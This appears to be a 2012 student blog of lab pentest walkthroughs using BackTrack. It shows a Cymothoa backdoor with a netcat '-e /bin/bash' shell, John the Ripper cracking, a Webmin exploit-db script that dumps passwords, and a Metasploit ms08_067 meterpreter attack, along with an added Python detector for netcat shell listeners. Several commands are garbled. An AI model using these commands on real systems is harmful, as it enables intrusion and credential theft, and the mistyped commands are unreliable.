Monday, 30 January 2012

USING THE CYMOTHOA BACKDOOR WITH NC, PART 1

To set up the Cymothoa backdoor on Ubuntu, there are some things we must pay attention to:
1. Open VirtualBox and run Ubuntu.
2. Connect Ubuntu to BackTrack.
3. Open a terminal in BackTrack, then run Cymothoa: open it as root, then select and choose backdoor, pentest, then double-click Cymothoa.


After that, go to the terminal in Ubuntu and run Cymothoa with the command # ps ax.

If confused, you can type the command nc -h

-h (help); the picture is as follows:


I got the port from Nessus: 5353.
Open a terminal and then type the command nc-l-5353 -e > cy /bin/bash
The picture is as follows:

THANKS TO YOU ALL.
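A netcat process that listens on a port and passes the connection to /bin/bash with -e, as in the post above, shows up in the same ps ax listing the post uses. As an added example (not part of the original post), this Python scans ps ax-style output for such processes; the sample listing is constructed, and the option tables are assumptions based on traditional netcat and ncat flag spellings.

```python
import os

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional"}
TAKES_VALUE = set("ecpswiqo")  # assumption: short options that consume a value
LONG_ALIASES = {"--listen": "-l", "--exec": "-e", "--sh-exec": "-c"}  # ncat spellings

# Constructed sample in `ps ax` layout (PID TTY STAT TIME COMMAND), not real output.
SAMPLE_PS = """\
  PID TTY      STAT   TIME COMMAND
  812 ?        Ss     0:00 /usr/sbin/sshd -D
 1440 pts/0    S+     0:00 nc -l -p 5353 -e /bin/bash
 1502 pts/1    S+     0:00 nc -lvp 4000
 1623 ?        S      0:00 /bin/nc.traditional -lp 5353 -e/bin/sh
 1700 pts/2    S+     0:00 nc -h
"""

def parse_opts(args):
    """Return ({flag: value or True}, positionals) for a netcat argument list."""
    opts, positional, i = {}, [], 0
    while i < len(args):
        arg = LONG_ALIASES.get(args[i], args[i])
        i += 1
        if len(arg) < 2 or arg[0] != "-" or arg[1] == "-":
            positional.append(arg)
            continue
        for pos, flag in enumerate(arg[1:]):      # walk clusters such as -lvp
            opts[flag] = True
            if flag in TAKES_VALUE:
                value = arg[pos + 2:]             # glued form: -e/bin/sh
                if not value and i < len(args):   # separate form: -e /bin/sh
                    value, i = args[i], i + 1
                opts[flag] = value or True
                break
    return opts, positional

def find_exec_listeners(ps_output):
    """Flag netcat processes that listen (-l) and hand the socket to a program (-e/-c)."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 4)
        argv = parts[4].split() if len(parts) == 5 and parts[0].isdigit() else [""]  # header -> [""]
        if os.path.basename(argv[0]) not in NETCAT_NAMES:
            continue
        opts, positional = parse_opts(argv[1:])
        program = opts.get("e") or opts.get("c")
        if "l" in opts and program:
            port = opts.get("p") or next((a for a in positional if a.isdigit()), None)
            hits.append({"pid": int(parts[0]), "port": port, "program": program})
    return hits
```

Calling find_exec_listeners(SAMPLE_PS) reports PIDs 1440 and 1623 and ignores the plain listener and the nc -h call; on a live host the input would be the captured output of ps ax.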

JOHN THE RIPPER

We try to crack a password using John the Ripper.
The commands that can be used are as follows:
1. Open the John the Ripper application on BackTrack.
    Example image of the John the Ripper application.





root@bt:/pentest/passwords/john# ls -l
This command lists the contents of the John the Ripper directory, including its commands.




root@bt:/pentest/passwords/john# john -si cari.txt
This command is used to display the password that we got from the db exploit earlier; I saved the passwords under the name "cari" ("search") in "txt" format.




After the picture above appears, do not forget to pay attention, because there are 5 files that are unreadable. Please try the John the Ripper commands yourself.

THANKS TO ALL.


PRIVILEGE ESCALATION

Privilege escalation is a technique to go in and take the access of others.

So, to do privilege escalation on IP address 192.168.0.21, there are things we have to pay attention to:
1. Seek information about the target.
2. Look for the systems that run on the target.
3. Look for weaknesses of the target.
4. Take over or enter the target's system.

The steps are as follows:
1. Finding information about the target. We can use some of the applications in BackTrack 5:
    - Open Information Gathering, select network scanning, and choose whichever tool you want.
      Sample image using the Zenmap application:

2. After gathering various information, next we look for any system that runs on IP 192.168.0.21.
    Example image of the running systems:





3. Having seen what is running on IP address 192.168.0.21, next we look for flaws in the system using Nessus.
    Sample images of looking for gaps with Nessus:

In this image we log in to Nessus.


This image appears after you click + Add scan; after that we enter name = local instance and target IP = 192.168.0.21. Example:


The image above appears if we succeed in scanning 192.168.0.21; then click Reports to display the results and click local to find the vulnerabilities.


In the picture above I clicked on local; many entries appear, so please search for the vulnerability. For example, when we click ssh, there are many systems that are running and there is a high-level system.

4. Okay, now we exploit it, because the conditions are already sufficient for exploitation.
    Here we can use msfconsole or exploit-db. These are a few example pictures:

The image above is the preview image of exploit-db.
With this command we can see which exploits we can use:
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin

With the command below we see the following results:
root@bt:/pentest/exploits/exploitdb# ls

With the command below we see the following results:
root@bt:/pentest/exploits/exploitdb# cat platforms/multiple/remote/2017.pl

With the command below we see the following results: results from port 10000 for Webmin
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl

With this command we see all the passwords, users, logins, etc.
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000





Friday, 27 January 2012

EXPLOITATION OF WINDOWS XP USING METASPLOIT

The first thing we do is open VirtualBox and then click Start, but first pay attention to the commands in Windows XP.
The steps are:
1. Open VirtualBox.
2. Select Windows XP and then click Start.
    After you click Start, an image like this appears.
3. Next click Start and select Cmd, then type "ipconfig" to check the connection.
    After you click Start, an image like this appears.
4. After typing the command "ipconfig", the image below appears if successful; then type the ping command with IP 192.168.43.1. This IP is taken from ipconfig, with the final part replaced by the number 1.
5. Next open a terminal in BackTrack and type ping 192.168.43.128. This IP is taken from Windows XP.
After the connection is successful, we gather information directly on Windows. Many tools can be used to find out about the Windows machine, e.g. nmap, zenmap and autoscan, but I use Zenmap to find out what info there is on Windows.
The steps are:
1. Open Applications in BackTrack
2. Information Gathering
3. Network Analysis
4. Network Scanner
5. Click Zenmap
    An example like this picture appears after we open Zenmap.
6. Next, type the IP 192.168.43.128 in Target. The results are as shown below when the target IP is entered.


After we get our information about the systems and services, next we find the gap.
1. Type /etc/init.d/nessusd start to run Nessus.
2. Open localhost:8834
    If this is done successfully, in Nessus click Scans, then click Add and enter your name and the target that you want.


3. Next click Launch Scan; it will appear as in the image below.
4. Next click Reports; it will appear as in the image below.
5. Click IP 192.168.43.128; next, many ports etc. appear.
    I chose udp and Network Time Protocol (NTP) appears.


Synopsis: An NTP server is listening on the remote host.

Description
An NTP (Network Time Protocol) server is listening on this port.  It
provides information about the current date and time of the remote
system and may provide system information.

Solution
n/a

Risk Factor: None

Plugin Publication Date: 2002/03/13

Plugin Last Modification Date: 2011/03/11


Next we use Metasploit.
The commands to run in Metasploit are as follows:
1. root@bt:~# msfconsole
2. msf > use windows/smb/ms08_067_netapi
3. set payload windows/meterpreter/bind_tcp
4. set RHOST 192.168.43.128
5. exploit
These are a few example images of it running in Metasploit.



GOOD LUCK TO MY FRIENDS

VULNERABILITY ASSESSMENT USING NESSUS AND EXPLOITATION

SCANNING USING NESSUS.


The first thing to do is run Nessus.
1. Open a terminal and type this command:
    root@bt:~# /etc/init.d/nessusd start
2. Open your browser and then type localhost:8834
    This is the preview image when it opens:


3. After that, click on the image to go to http://120.0.0.1:8834; this is its display after we click.

4. After that, wait, then enter the username and also the password. This is the picture.

5. The next image will appear directly below; just click OK.
6. The next image will appear below; please select Scans.


7. The next image will appear below; please click / select Add.

After you click Add, we are asked to enter a name (the name is up to you); this is the picture.


8. Please enter name: fitri (for example) and enter the target IP that we want. Next, the IP that we typed in will be scanned automatically. A picture will emerge after this scan. To find out where the gaps are, select it there.

  GOOD LUCK TO YOU ALL.

EXPLOITATION.
Please go through the BackTrack Applications menu:
1. Select Exploitation Tools
2. Next select Open Source Exploitation
3. Next select Exploit-DB
4. Next select Exploitdb search
     After you open exploitdb search, this is the sample picture.
5. Next you can type ./searchsploit smb; after you type the above command, a picture like this will show.
6. The output of ./searchsploit smb contains many commands; please read and follow them, and we can also build our own commands from them.


Good luck, hopefully you get a new experience, amen.



Wednesday, 25 January 2012

HOW TO INSTALL NESSUS


How to install the Nessus tool:
First of all I downloaded the tool from the address http://www.tenable.com/products/nessus/nessus-download-agreement
After that we start the install program of Nessus.
Double-click the program that was downloaded earlier.
Click Install on the page.
After we click Install, it will appear as shown below.

That is all for now. To be continued.